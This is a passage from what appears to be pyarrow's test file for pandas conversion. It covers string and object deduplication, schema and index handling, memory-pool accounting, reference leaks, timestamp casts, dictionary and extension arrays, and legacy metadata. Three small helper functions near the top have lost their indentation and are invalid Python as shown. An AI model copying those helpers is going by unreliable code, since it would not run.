    _check_serialize_components_roundtrip(df)
def _pytime_from_micros(val):
microseconds = val % 1000000
val //= 1000000
seconds = val % 60
val //= 60
minutes = val % 60
hours = val // 60
return time(hours, minutes, seconds, microseconds)
def _pytime_to_micros(pytime):
return (pytime.hour * 3600000000 +
pytime.minute * 60000000 +
pytime.second * 1000000 +
pytime.microsecond)
def test_convert_unsupported_type_error_message():
    """Unsupported dtypes must fail with a message naming the offending
    column (ARROW-1454). Period is as-yet unsupported."""
    frame = pd.DataFrame({
        'a': pd.period_range('2000-01-01', periods=20),
    })
    with pytest.raises(
            pa.ArrowInvalid,
            match='Conversion failed for column a with type period'):
        pa.Table.from_pandas(frame)
# ----------------------------------------------------------------------
# Test object deduplication in to_pandas
def _generate_dedup_example(nunique, repeats):
    """Return `nunique` distinct random strings, the whole set repeated
    `repeats` times (length nunique * repeats)."""
    distinct = [tm.rands(10) for _ in range(nunique)]
    return distinct * repeats
def _assert_nunique(obj, expected):
assert len({id(x) for x in obj}) == expected
def test_to_pandas_deduplicate_strings_array_types():
    """Equal strings share one Python object after to_pandas() by default;
    deduplicate_objects=False materializes every element separately."""
    nunique, repeats = 100, 10
    values = _generate_dedup_example(nunique, repeats)
    candidates = [
        pa.array(values, type=pa.binary()),
        pa.array(values, type=pa.utf8()),
        pa.chunked_array([values, values]),
    ]
    for arr in candidates:
        _assert_nunique(arr.to_pandas(), nunique)
        _assert_nunique(arr.to_pandas(deduplicate_objects=False), len(arr))
def test_to_pandas_deduplicate_strings_table_types():
    """String deduplication also applies when converting RecordBatch and
    Table objects, not just bare arrays."""
    nunique, repeats = 100, 10
    values = _generate_dedup_example(nunique, repeats)
    arr = pa.array(values)
    batch = pa.RecordBatch.from_arrays([arr], ['foo'])
    containers = [batch, pa.Table.from_batches([batch])]
    for container in containers:
        _assert_nunique(container.to_pandas()['foo'], nunique)
        _assert_nunique(
            container.to_pandas(deduplicate_objects=False)['foo'],
            len(container))
def test_to_pandas_deduplicate_integers_as_objects():
    """Boxed integers (integer_object_nulls=True) are deduplicated too."""
    nunique, repeats = 100, 10
    # Python automatically interns smaller integers, so use large ones.
    unique_values = list(np.random.randint(10000000, 1000000000,
                                           size=nunique))
    unique_values[nunique // 2] = None
    arr = pa.array(unique_values * repeats)
    _assert_nunique(arr.to_pandas(integer_object_nulls=True), nunique)
    # Without dedup every value is boxed separately; None is a singleton,
    # so it counts once no matter how often it occurs.
    _assert_nunique(
        arr.to_pandas(integer_object_nulls=True, deduplicate_objects=False),
        (nunique - 1) * repeats + 1)
def test_to_pandas_deduplicate_date_time():
    """Date and time objects produced by to_pandas() are deduplicated when
    deduplicate_objects is left at its default."""
    nunique, repeats = 100, 10
    base_values = list(range(nunique))
    # (storage type, logical type, to_pandas kwargs); dates are converted
    # with date_as_object=True so the result holds Python objects.
    scenarios = [
        ('int32', 'date32', {'date_as_object': True}),
        ('int64', 'date64', {'date_as_object': True}),
        ('int32', 'time32[ms]', {}),
        ('int64', 'time64[us]', {}),
    ]
    for storage_type, logical_type, pandas_kwargs in scenarios:
        raw = pa.array(base_values * repeats, type=storage_type)
        casted = raw.cast(logical_type)
        _assert_nunique(casted.to_pandas(**pandas_kwargs), nunique)
        _assert_nunique(
            casted.to_pandas(deduplicate_objects=False, **pandas_kwargs),
            len(casted))
# ---------------------------------------------------------------------
def test_table_from_pandas_checks_field_nullability():
    """A schema declaring non-nullable fields must reject a DataFrame that
    contains nulls in those columns (ARROW-2136)."""
    frame = pd.DataFrame({'a': [1.2, 2.1, 3.1],
                          'b': [np.nan, 'string', 'foo']})
    strict_schema = pa.schema([
        pa.field('a', pa.float64(), nullable=False),
        pa.field('b', pa.utf8(), nullable=False),
    ])
    with pytest.raises(ValueError):
        pa.Table.from_pandas(frame, schema=strict_schema)
def test_table_from_pandas_keeps_column_order_of_dataframe():
    """Without an explicit schema, the converted table's column order must
    follow the DataFrame's own column order."""
    base = pd.DataFrame(OrderedDict([
        ('partition', [0, 0, 1, 1]),
        ('arrays', [[0, 1, 2], [3, 4], None, None]),
        ('floats', [None, None, 1.1, 3.3])
    ]))
    reordered = base[['floats', 'partition', 'arrays']]
    expected_base = pa.schema([
        ('partition', pa.int64()),
        ('arrays', pa.list_(pa.int64())),
        ('floats', pa.float64()),
    ])
    expected_reordered = pa.schema([
        ('floats', pa.float64()),
        ('partition', pa.int64()),
        ('arrays', pa.list_(pa.int64())),
    ])
    table_base = pa.Table.from_pandas(base, preserve_index=False)
    table_reordered = pa.Table.from_pandas(reordered, preserve_index=False)
    assert table_base.schema.equals(expected_base, check_metadata=False)
    assert table_reordered.schema.equals(expected_reordered,
                                         check_metadata=False)
def test_table_from_pandas_keeps_column_order_of_schema():
    """With an explicit schema, the schema's column order wins regardless
    of the DataFrame's column order (ARROW-3766)."""
    frame = pd.DataFrame(OrderedDict([
        ('partition', [0, 0, 1, 1]),
        ('arrays', [[0, 1, 2], [3, 4], None, None]),
        ('floats', [None, None, 1.1, 3.3])
    ]))
    explicit_schema = pa.schema([
        ('floats', pa.float64()),
        ('arrays', pa.list_(pa.int32())),
        ('partition', pa.int32())
    ])
    part0 = frame[frame.partition == 0]
    part1 = frame[frame.partition == 1][['floats', 'partition', 'arrays']]
    table0 = pa.Table.from_pandas(part0, schema=explicit_schema,
                                  preserve_index=False)
    table1 = pa.Table.from_pandas(part1, schema=explicit_schema,
                                  preserve_index=False)
    assert table0.schema.equals(explicit_schema, check_metadata=False)
    assert table0.schema.equals(table1.schema, check_metadata=False)
def test_table_from_pandas_columns_argument_only_does_filtering():
    """The `columns` argument selects which DataFrame columns are
    converted; types are still inferred from the data."""
    frame = pd.DataFrame(OrderedDict([
        ('partition', [0, 0, 1, 1]),
        ('arrays', [[0, 1, 2], [3, 4], None, None]),
        ('floats', [None, None, 1.1, 3.3])
    ]))
    cases = [
        (['arrays', 'floats', 'partition'],
         pa.schema([
             ('arrays', pa.list_(pa.int64())),
             ('floats', pa.float64()),
             ('partition', pa.int64()),
         ])),
        (['floats', 'partition'],
         pa.schema([
             ('floats', pa.float64()),
             ('partition', pa.int64()),
         ])),
    ]
    for selected, expected_schema in cases:
        converted = pa.Table.from_pandas(frame, columns=selected,
                                         preserve_index=False)
        assert converted.schema.equals(expected_schema, check_metadata=False)
def test_table_from_pandas_columns_and_schema_are_mutually_exclusive():
    """Passing both `schema` and `columns` is ambiguous and must raise."""
    frame = pd.DataFrame(OrderedDict([
        ('partition', [0, 0, 1, 1]),
        ('arrays', [[0, 1, 2], [3, 4], None, None]),
        ('floats', [None, None, 1.1, 3.3])
    ]))
    explicit_schema = pa.schema([
        ('partition', pa.int32()),
        ('arrays', pa.list_(pa.int32())),
        ('floats', pa.float64()),
    ])
    with pytest.raises(ValueError):
        pa.Table.from_pandas(frame, schema=explicit_schema,
                             columns=['arrays', 'floats'])
def test_table_from_pandas_keeps_schema_nullability():
    """Field nullability defaults to True, but an explicit schema's
    nullability must be preserved (ARROW-5169)."""
    frame = pd.DataFrame({'a': [1, 2, 3, 4]})
    non_nullable = pa.schema([
        pa.field('a', pa.int64(), nullable=False),
    ])
    inferred = pa.Table.from_pandas(frame)
    assert inferred.schema.field('a').nullable is True
    explicit = pa.Table.from_pandas(frame, schema=non_nullable)
    assert explicit.schema.field('a').nullable is False
def test_table_from_pandas_schema_index_columns():
    """Interaction of an explicit schema with index columns (ARROW-5220).

    Covers: schema naming a missing index, a named index round trip with
    each preserve_index mode, schema column order, schemas omitting the
    index, and MultiIndex levels (full and partial).
    """
    df = pd.DataFrame({'a': [1, 2, 3], 'b': [0.1, 0.2, 0.3]})
    schema = pa.schema([
        ('a', pa.int64()),
        ('b', pa.float64()),
        ('index', pa.int32()),
    ])
    # schema includes index with name not in dataframe
    with pytest.raises(KeyError, match="name 'index' present in the"):
        pa.Table.from_pandas(df, schema=schema)
    df.index.name = 'index'
    # schema includes correct index name -> roundtrip works
    _check_pandas_roundtrip(df, schema=schema, preserve_index=True,
                            expected_schema=schema)
    # schema includes correct index name but preserve_index=False
    with pytest.raises(KeyError):
        pa.Table.from_pandas(df, schema=schema, preserve_index=False)
    # in case of preserve_index=None -> RangeIndex serialized as metadata
    # clashes with the index in the schema
    with pytest.raises(ValueError, match="name 'index' is present in the "
                                         "schema, but it is a RangeIndex"):
        pa.Table.from_pandas(df, schema=schema, preserve_index=None)
    df.index = pd.Index([0, 1, 2], name='index')
    # for non-RangeIndex, both preserve_index=None and True work
    _check_pandas_roundtrip(df, schema=schema, preserve_index=None,
                            expected_schema=schema)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=True,
                            expected_schema=schema)
    # schema has different order (index column not at the end)
    schema = pa.schema([
        ('index', pa.int32()),
        ('a', pa.int64()),
        ('b', pa.float64()),
    ])
    _check_pandas_roundtrip(df, schema=schema, preserve_index=None,
                            expected_schema=schema)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=True,
                            expected_schema=schema)
    # schema does not include the index -> index is not included as column
    # even though preserve_index=True/None
    schema = pa.schema([
        ('a', pa.int64()),
        ('b', pa.float64()),
    ])
    expected = df.copy()
    expected = expected.reset_index(drop=True)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=None,
                            expected_schema=schema, expected=expected)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=True,
                            expected_schema=schema, expected=expected)
    # dataframe with a MultiIndex
    df.index = pd.MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)],
                                         names=['level1', 'level2'])
    schema = pa.schema([
        ('level1', pa.string()),
        ('level2', pa.int64()),
        ('a', pa.int64()),
        ('b', pa.float64()),
    ])
    _check_pandas_roundtrip(df, schema=schema, preserve_index=True,
                            expected_schema=schema)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=None,
                            expected_schema=schema)
    # only one of the levels of the MultiIndex is included
    schema = pa.schema([
        ('level2', pa.int64()),
        ('a', pa.int64()),
        ('b', pa.float64()),
    ])
    expected = df.copy()
    expected = expected.reset_index('level1', drop=True)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=True,
                            expected_schema=schema, expected=expected)
    _check_pandas_roundtrip(df, schema=schema, preserve_index=None,
                            expected_schema=schema, expected=expected)
# ----------------------------------------------------------------------
# RecordBatch, Table
def test_recordbatch_from_to_pandas():
    """A DataFrame -> RecordBatch -> DataFrame round trip is lossless."""
    original = pd.DataFrame({
        'c1': np.array([1, 2, 3, 4, 5], dtype='int64'),
        'c2': np.array([1, 2, 3, 4, 5], dtype='uint32'),
        'c3': np.random.randn(5),
        'c4': ['foo', 'bar', None, 'baz', 'qux'],
        'c5': [False, True, False, True, False]
    })
    roundtripped = pa.RecordBatch.from_pandas(original).to_pandas()
    tm.assert_frame_equal(original, roundtripped)
def test_recordbatchlist_to_pandas():
    """A Table built from several batches converts to the concatenation of
    the original frames."""
    frames = [
        pd.DataFrame({
            'c1': np.array([1, 1, 2], dtype='uint32'),
            'c2': np.array([1.0, 2.0, 3.0], dtype='float64'),
            'c3': [True, None, False],
            'c4': ['foo', 'bar', None]
        }),
        pd.DataFrame({
            'c1': np.array([3, 5], dtype='uint32'),
            'c2': np.array([4.0, 5.0], dtype='float64'),
            'c3': [True, True],
            'c4': ['baz', 'qux']
        }),
    ]
    batches = [pa.RecordBatch.from_pandas(frame) for frame in frames]
    result = pa.Table.from_batches(batches).to_pandas()
    expected = pd.concat(frames).reset_index(drop=True)
    tm.assert_frame_equal(expected, result)
def test_recordbatch_table_pass_name_to_pandas():
    """Column names propagate to the resulting pandas Series' .name for
    both RecordBatch and Table conversions."""
    values = pa.array([1, 2, 3, 4])
    batch = pa.record_batch([values], names=['a0'])
    table = pa.table([values], names=['a0'])
    assert batch[0].to_pandas().name == 'a0'
    assert table[0].to_pandas().name == 'a0'
# ----------------------------------------------------------------------
# Metadata serialization
@pytest.mark.parametrize(
    ('type', 'expected'),
    [
        (pa.null(), 'empty'),
        (pa.bool_(), 'bool'),
        (pa.int8(), 'int8'),
        (pa.int16(), 'int16'),
        (pa.int32(), 'int32'),
        (pa.int64(), 'int64'),
        (pa.uint8(), 'uint8'),
        (pa.uint16(), 'uint16'),
        (pa.uint32(), 'uint32'),
        (pa.uint64(), 'uint64'),
        (pa.float16(), 'float16'),
        (pa.float32(), 'float32'),
        (pa.float64(), 'float64'),
        (pa.date32(), 'date'),
        (pa.date64(), 'date'),
        (pa.binary(), 'bytes'),
        (pa.binary(length=4), 'bytes'),
        (pa.string(), 'unicode'),
        (pa.list_(pa.list_(pa.int16())), 'list[list[int16]]'),
        (pa.decimal128(18, 3), 'decimal'),
        (pa.timestamp('ms'), 'datetime'),
        (pa.timestamp('us', 'UTC'), 'datetimetz'),
        (pa.time32('s'), 'time'),
        (pa.time64('us'), 'time')
    ]
)
def test_logical_type(type, expected):
    # Each Arrow type must map to the expected logical-type string used in
    # the serialized 'pandas' schema metadata.
    # NOTE: the parameter name `type` shadows the builtin, but it is fixed
    # by the parametrize ids above.
    assert get_logical_type(type) == expected
# ----------------------------------------------------------------------
# to_pandas uses MemoryPool
def test_array_uses_memory_pool():
    """to_pandas() allocations must be tracked by the Arrow memory pool and
    released once the pandas result is garbage collected (ARROW-6570)."""
    N = 10000
    arr = pa.array(np.arange(N, dtype=np.int64),
                   mask=np.random.randint(0, 2, size=N).astype(np.bool_))
    # In the case the gc is caught loafing
    gc.collect()
    prior_allocation = pa.total_allocated_bytes()
    x = arr.to_pandas()
    # The masked array cannot be converted zero-copy; the conversion
    # allocates N * 8 bytes from the pool.
    assert pa.total_allocated_bytes() == (prior_allocation + N * 8)
    # Dropping the pandas object must return the memory to the pool.
    x = None  # noqa
    gc.collect()
    assert pa.total_allocated_bytes() == prior_allocation
    # zero copy does not allocate memory
    arr = pa.array(np.arange(N, dtype=np.int64))
    prior_allocation = pa.total_allocated_bytes()
    x = arr.to_pandas()  # noqa
    assert pa.total_allocated_bytes() == prior_allocation
def test_table_uses_memory_pool():
    """Table.to_pandas() allocations come from the Arrow memory pool and
    are freed when the resulting DataFrame is collected."""
    N = 10000
    arr = pa.array(np.arange(N, dtype=np.int64))
    t = pa.table([arr], ['f0'])
    prior_allocation = pa.total_allocated_bytes()
    x = t.to_pandas()
    # Table conversion copies the column: N * 8 bytes from the pool.
    assert pa.total_allocated_bytes() == (prior_allocation + N * 8)
    # Check successful garbage collection
    x = None  # noqa
    gc.collect()
    assert pa.total_allocated_bytes() == prior_allocation
def test_object_leak_in_numpy_array():
    """Converting to an object ndarray must not leak references to the
    contained Python objects (ARROW-6876)."""
    arr = pa.array([{'a': 1}])
    np_arr = arr.to_pandas()
    assert np_arr.dtype == np.dtype('object')
    obj = np_arr[0]
    # Baseline refcount while the array still holds a reference; the
    # immediate re-check guards against getrefcount itself perturbing it.
    refcount = sys.getrefcount(obj)
    assert sys.getrefcount(obj) == refcount
    # Dropping the array must release exactly one reference to obj.
    del np_arr
    assert sys.getrefcount(obj) == refcount - 1
def test_object_leak_in_dataframe():
    """Table.to_pandas() must not leak references to objects stored in
    object-dtype columns (ARROW-6876)."""
    arr = pa.array([{'a': 1}])
    table = pa.table([arr], ['f0'])
    col = table.to_pandas()['f0']
    assert col.dtype == np.dtype('object')
    obj = col[0]
    # Baseline refcount while the column still references obj.
    refcount = sys.getrefcount(obj)
    assert sys.getrefcount(obj) == refcount
    # Dropping the column must release exactly one reference.
    del col
    assert sys.getrefcount(obj) == refcount - 1
# ----------------------------------------------------------------------
# Some nested array tests array tests
def test_array_from_py_float32():
    """Python floats convert to float32 scalars and to lists of float32."""
    rows = [[1.2, 3.4], [9.0, 42.0]]
    f32 = pa.float32()
    scalar_arr = pa.array(rows[0], type=f32)
    nested_arr = pa.array(rows, type=pa.list_(f32))
    assert scalar_arr.type == f32
    assert scalar_arr.equals(pa.array(np.array(rows[0], dtype=np.float32)))
    expected_nested = pd.Series([np.array(rows[0], dtype=np.float32),
                                 np.array(rows[1], dtype=np.float32)])
    assert nested_arr.equals(pa.array(expected_nested))
# ----------------------------------------------------------------------
# Timestamp tests
def test_cast_timestamp_unit():
    """Timestamp unit handling: tz-aware conversion, truncation safety
    (ARROW-1680, ARROW-1906, ARROW-1949)."""
    # ARROW-1680
    val = datetime.now()
    s = pd.Series([val])
    s_nyc = s.dt.tz_localize('tzlocal()').dt.tz_convert('America/New_York')
    us_with_tz = pa.timestamp('us', tz='America/New_York')
    arr = pa.Array.from_pandas(s_nyc, type=us_with_tz)
    # ARROW-1906
    assert arr.type == us_with_tz
    arr2 = pa.Array.from_pandas(s, type=pa.timestamp('us'))
    assert arr[0].as_py() == s_nyc[0].to_pydatetime()
    assert arr2[0].as_py() == s[0].to_pydatetime()
    # Disallow truncation: casting ms -> s would drop sub-second digits,
    # so the safe cast raises and safe=False truncates explicitly.
    arr = pa.array([123123], type='int64').cast(pa.timestamp('ms'))
    expected = pa.array([123], type='int64').cast(pa.timestamp('s'))
    target = pa.timestamp('s')
    with pytest.raises(ValueError):
        arr.cast(target)
    result = arr.cast(target, safe=False)
    assert result.equals(expected)
    # ARROW-1949: nanosecond Timestamps to microsecond arrays would lose
    # precision; only safe=False permits it.
    series = pd.Series([pd.Timestamp(1), pd.Timestamp(10), pd.Timestamp(1000)])
    expected = pa.array([0, 0, 1], type=pa.timestamp('us'))
    with pytest.raises(ValueError):
        pa.array(series, type=pa.timestamp('us'))
    with pytest.raises(ValueError):
        pa.Array.from_pandas(series, type=pa.timestamp('us'))
    result = pa.Array.from_pandas(series, type=pa.timestamp('us'), safe=False)
    assert result.equals(expected)
    result = pa.array(series, type=pa.timestamp('us'), safe=False)
    assert result.equals(expected)
# ----------------------------------------------------------------------
# DictionaryArray tests
def test_dictionary_with_pandas():
    """DictionaryArray converts to an equivalent pandas Categorical, with
    masked entries becoming nulls (code -1)."""
    codes = np.repeat([0, 1, 2], 2)
    categories = np.array(['foo', 'bar', 'baz'], dtype=object)
    null_mask = np.array([False, False, True, False, False, False])
    plain = pa.DictionaryArray.from_arrays(codes, categories)
    masked = pa.DictionaryArray.from_arrays(codes, categories,
                                            mask=null_mask)
    # Without a mask the categorical mirrors the codes directly.
    tm.assert_series_equal(
        pd.Series(plain.to_pandas()),
        pd.Series(pd.Categorical.from_codes(codes, categories=categories)))
    # Masked entries turn into code -1 (null) in the categorical.
    masked_codes = np.where(null_mask, -1, codes)
    tm.assert_series_equal(
        pd.Series(masked.to_pandas()),
        pd.Series(pd.Categorical.from_codes(masked_codes,
                                            categories=categories)))
def random_strings(n, item_size, pct_null=0, dictionary=None):
    """Return an object ndarray of `n` random strings.

    Strings are drawn from `dictionary` when given, otherwise generated as
    fresh ASCII strings of length `item_size`. A `pct_null` fraction of
    entries is replaced with None.
    """
    if dictionary is None:
        result = np.array([random_ascii(item_size) for _ in range(n)],
                          dtype=object)
    else:
        result = dictionary[np.random.randint(0, len(dictionary), size=n)]
    if pct_null > 0:
        result[np.random.rand(n) < pct_null] = None
    return result
def test_variable_dictionary_to_pandas():
    """Chunked dictionary arrays whose chunks use different dictionaries
    must convert to one Categorical over the concatenated dictionaries,
    matching a dense (string-cast) conversion of the same data."""
    np.random.seed(12345)
    d1 = pa.array(random_strings(100, 32), type='string')
    d2 = pa.array(random_strings(100, 16), type='string')
    d3 = pa.array(random_strings(10000, 10), type='string')
    a1 = pa.DictionaryArray.from_arrays(
        np.random.randint(0, len(d1), size=1000, dtype='i4'),
        d1
    )
    a2 = pa.DictionaryArray.from_arrays(
        np.random.randint(0, len(d2), size=1000, dtype='i4'),
        d2
    )
    # With some nulls
    a3 = pa.DictionaryArray.from_arrays(
        np.random.randint(0, len(d3), size=1000, dtype='i4'), d3)
    i4 = pa.array(
        np.random.randint(0, len(d3), size=1000, dtype='i4'),
        mask=np.random.rand(1000) < 0.1
    )
    a4 = pa.DictionaryArray.from_arrays(i4, d3)
    expected_dict = pa.concat_arrays([d1, d2, d3])
    a = pa.chunked_array([a1, a2, a3, a4])
    # Same data, but dictionary-decoded to plain strings per chunk.
    a_dense = pa.chunked_array([a1.cast('string'),
                                a2.cast('string'),
                                a3.cast('string'),
                                a4.cast('string')])
    result = a.to_pandas()
    result_dense = a_dense.to_pandas()
    assert (result.cat.categories == expected_dict.to_pandas()).all()
    # The dense result equals the categorical result rendered as strings,
    # with nulls restored where the dense conversion produced them.
    expected_dense = result.astype('str')
    expected_dense[result_dense.isnull()] = None
    tm.assert_series_equal(result_dense, expected_dense)
# ----------------------------------------------------------------------
# Array protocol in pandas conversions tests
def test_array_protocol():
    """pandas IntegerArray (__arrow_array__ protocol) conversion paths:
    table, array, with and without an explicit target type."""
    if LooseVersion(pd.__version__) < '0.24.0':
        pytest.skip('IntegerArray only introduced in 0.24')
    df = pd.DataFrame({'a': pd.Series([1, 2, None], dtype='Int64')})
    if LooseVersion(pd.__version__) < '0.26.0.dev':
        # with pandas<=0.25, trying to convert nullable integer errors
        with pytest.raises(TypeError):
            pa.table(df)
    else:
        # __arrow_array__ added to pandas IntegerArray in 0.26.0.dev
        # default conversion
        result = pa.table(df)
        expected = pa.array([1, 2, None], pa.int64())
        assert result[0].chunk(0).equals(expected)
        # with specifying schema
        schema = pa.schema([('a', pa.float64())])
        result = pa.table(df, schema=schema)
        expected2 = pa.array([1, 2, None], pa.float64())
        assert result[0].chunk(0).equals(expected2)
        # pass Series to pa.array
        result = pa.array(df['a'])
        assert result.equals(expected)
        result = pa.array(df['a'], type=pa.float64())
        assert result.equals(expected2)
        # pass actual ExtensionArray to pa.array
        result = pa.array(df['a'].values)
        assert result.equals(expected)
        result = pa.array(df['a'].values, type=pa.float64())
        assert result.equals(expected2)
# ----------------------------------------------------------------------
# Pandas ExtensionArray support
def _to_pandas(table, extension_columns=None):
    """Convert *table* to a DataFrame via table_to_blockmanager.

    Temporary test helper as long as there is no public API exposing the
    extension_columns option.
    """
    from pyarrow.pandas_compat import table_to_blockmanager
    conversion_options = {
        'pool': None,
        'strings_to_categorical': False,
        'zero_copy_only': False,
        'integer_object_nulls': False,
        'date_as_object': True,
        'use_threads': True,
        'deduplicate_objects': True,
    }
    block_manager = table_to_blockmanager(
        conversion_options, table, extension_columns=extension_columns)
    return pd.DataFrame(block_manager)
def test_convert_to_extension_array():
    """Columns named in extension_columns convert to pandas
    ExtensionBlocks instead of consolidated numpy blocks."""
    if LooseVersion(pd.__version__) < '0.24.0':
        pytest.skip(reason='IntegerArray only introduced in 0.24')
    import pandas.core.internals as _int
    # Default: both int columns consolidate into a single IntBlock.
    table = pa.table({'a': [1, 2, 3], 'b': [2, 3, 4]})
    df = _to_pandas(table)
    assert len(df._data.blocks) == 1
    assert isinstance(df._data.blocks[0], _int.IntBlock)
    # Requesting 'b' as an extension column splits the frame into an
    # IntBlock plus an ExtensionBlock.
    df = _to_pandas(table, extension_columns=['b'])
    assert isinstance(df._data.blocks[0], _int.IntBlock)
    assert isinstance(df._data.blocks[1], _int.ExtensionBlock)
    # A nullable column becomes pandas' Int64 extension dtype.
    table = pa.table({'a': [1, 2, None]})
    df = _to_pandas(table, extension_columns=['a'])
    assert isinstance(df._data.blocks[0], _int.ExtensionBlock)
    expected = pd.DataFrame({'a': pd.Series([1, 2, None], dtype='Int64')})
    tm.assert_frame_equal(df, expected)
# ----------------------------------------------------------------------
# Legacy metadata compatibility tests
def test_metadata_compat_range_index_pre_0_12():
    """Forward compatibility for 'pandas' schema metadata created from a
    pandas.RangeIndex by pyarrow < 0.13.0 (index stored as a materialized
    column rather than as range metadata).

    Each case hand-crafts the legacy JSON metadata and checks to_pandas()
    reconstructs the expected frame.
    """
    a_values = [u'foo', u'bar', None, u'baz']
    b_values = [u'a', u'a', u'b', u'b']
    a_arrow = pa.array(a_values, type='utf8')
    b_arrow = pa.array(b_values, type='utf8')
    rng_index_arrow = pa.array([0, 2, 4, 6], type='int64')
    gen_name_0 = '__index_level_0__'
    gen_name_1 = '__index_level_1__'
    # Case 1: named RangeIndex
    e1 = pd.DataFrame({
        'a': a_values
    }, index=pd.RangeIndex(0, 8, step=2, name='qux'))
    t1 = pa.Table.from_arrays([a_arrow, rng_index_arrow],
                              names=['a', 'qux'])
    t1 = t1.replace_schema_metadata({
        b'pandas': json.dumps(
            {'index_columns': ['qux'],
             'column_indexes': [{'name': None,
                                 'field_name': None,
                                 'pandas_type': 'unicode',
                                 'numpy_type': 'object',
                                 'metadata': {'encoding': 'UTF-8'}}],
             'columns': [{'name': 'a',
                          'field_name': 'a',
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None},
                         {'name': 'qux',
                          'field_name': 'qux',
                          'pandas_type': 'int64',
                          'numpy_type': 'int64',
                          'metadata': None}],
             'pandas_version': '0.23.4'}
        )})
    r1 = t1.to_pandas()
    tm.assert_frame_equal(r1, e1)
    # Case 2: named RangeIndex, but conflicts with an actual column
    e2 = pd.DataFrame({
        'qux': a_values
    }, index=pd.RangeIndex(0, 8, step=2, name='qux'))
    t2 = pa.Table.from_arrays([a_arrow, rng_index_arrow],
                              names=['qux', gen_name_0])
    t2 = t2.replace_schema_metadata({
        b'pandas': json.dumps(
            {'index_columns': [gen_name_0],
             'column_indexes': [{'name': None,
                                 'field_name': None,
                                 'pandas_type': 'unicode',
                                 'numpy_type': 'object',
                                 'metadata': {'encoding': 'UTF-8'}}],
             'columns': [{'name': 'a',
                          'field_name': 'a',
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None},
                         {'name': 'qux',
                          'field_name': gen_name_0,
                          'pandas_type': 'int64',
                          'numpy_type': 'int64',
                          'metadata': None}],
             'pandas_version': '0.23.4'}
        )})
    r2 = t2.to_pandas()
    tm.assert_frame_equal(r2, e2)
    # Case 3: unnamed RangeIndex
    e3 = pd.DataFrame({
        'a': a_values
    }, index=pd.RangeIndex(0, 8, step=2, name=None))
    t3 = pa.Table.from_arrays([a_arrow, rng_index_arrow],
                              names=['a', gen_name_0])
    t3 = t3.replace_schema_metadata({
        b'pandas': json.dumps(
            {'index_columns': [gen_name_0],
             'column_indexes': [{'name': None,
                                 'field_name': None,
                                 'pandas_type': 'unicode',
                                 'numpy_type': 'object',
                                 'metadata': {'encoding': 'UTF-8'}}],
             'columns': [{'name': 'a',
                          'field_name': 'a',
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None},
                         {'name': None,
                          'field_name': gen_name_0,
                          'pandas_type': 'int64',
                          'numpy_type': 'int64',
                          'metadata': None}],
             'pandas_version': '0.23.4'}
        )})
    r3 = t3.to_pandas()
    tm.assert_frame_equal(r3, e3)
    # Case 4: MultiIndex with named RangeIndex
    e4 = pd.DataFrame({
        'a': a_values
    }, index=[pd.RangeIndex(0, 8, step=2, name='qux'), b_values])
    t4 = pa.Table.from_arrays([a_arrow, rng_index_arrow, b_arrow],
                              names=['a', 'qux', gen_name_1])
    t4 = t4.replace_schema_metadata({
        b'pandas': json.dumps(
            {'index_columns': ['qux', gen_name_1],
             'column_indexes': [{'name': None,
                                 'field_name': None,
                                 'pandas_type': 'unicode',
                                 'numpy_type': 'object',
                                 'metadata': {'encoding': 'UTF-8'}}],
             'columns': [{'name': 'a',
                          'field_name': 'a',
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None},
                         {'name': 'qux',
                          'field_name': 'qux',
                          'pandas_type': 'int64',
                          'numpy_type': 'int64',
                          'metadata': None},
                         {'name': None,
                          'field_name': gen_name_1,
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None}],
             'pandas_version': '0.23.4'}
        )})
    r4 = t4.to_pandas()
    tm.assert_frame_equal(r4, e4)
    # Case 5: MultiIndex with unnamed RangeIndex
    # (comment previously mislabeled this as a second "Case 4")
    e5 = pd.DataFrame({
        'a': a_values
    }, index=[pd.RangeIndex(0, 8, step=2, name=None), b_values])
    t5 = pa.Table.from_arrays([a_arrow, rng_index_arrow, b_arrow],
                              names=['a', gen_name_0, gen_name_1])
    t5 = t5.replace_schema_metadata({
        b'pandas': json.dumps(
            {'index_columns': [gen_name_0, gen_name_1],
             'column_indexes': [{'name': None,
                                 'field_name': None,
                                 'pandas_type': 'unicode',
                                 'numpy_type': 'object',
                                 'metadata': {'encoding': 'UTF-8'}}],
             'columns': [{'name': 'a',
                          'field_name': 'a',
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None},
                         {'name': None,
                          'field_name': gen_name_0,
                          'pandas_type': 'int64',
                          'numpy_type': 'int64',
                          'metadata': None},
                         {'name': None,
                          'field_name': gen_name_1,
                          'pandas_type': 'unicode',
                          'numpy_type': 'object',
                          'metadata': None}],
             'pandas_version': '0.23.4'}
        )})
    r5 = t5.to_pandas()
    tm.assert_frame_equal(r5, e5)
def test_metadata_compat_missing_field_name():
    """Tolerate 'pandas' metadata that omits field_name but stores the
    index as metadata.

    This combo occurs in the latest versions of fastparquet (0.3.2), but
    not in pyarrow itself (since field_name was added in 0.8, index as
    metadata only added later).
    """
    a_values = [1, 2, 3, 4]
    b_values = [u'a', u'b', u'c', u'd']
    a_arrow = pa.array(a_values, type='int64')
    b_arrow = pa.array(b_values, type='utf8')
    expected = pd.DataFrame({
        'a': a_values,
        'b': b_values,
    }, index=pd.RangeIndex(0, 8, step=2, name='qux'))
    table = pa.table({'a': a_arrow, 'b': b_arrow})
    # metadata generated by fastparquet 0.3.2 with missing field_names
    table = table.replace_schema_metadata({
        b'pandas': json.dumps(
            {'column_indexes': [
                {'field_name': None,
                 'metadata': None,
                 'name': None,
                 'numpy_type': 'object',
                 'pandas_type': 'mixed-integer'}
            ],
                'columns': [
                {'metadata': None,
                 'name': 'a',
                 'numpy_type': 'int64',
                 'pandas_type': 'int64'},
                {'metadata': None,
                 'name': 'b',
                 'numpy_type': 'object',
                 'pandas_type': 'unicode'}
            ],
                'index_columns': [
                {'kind': 'range',
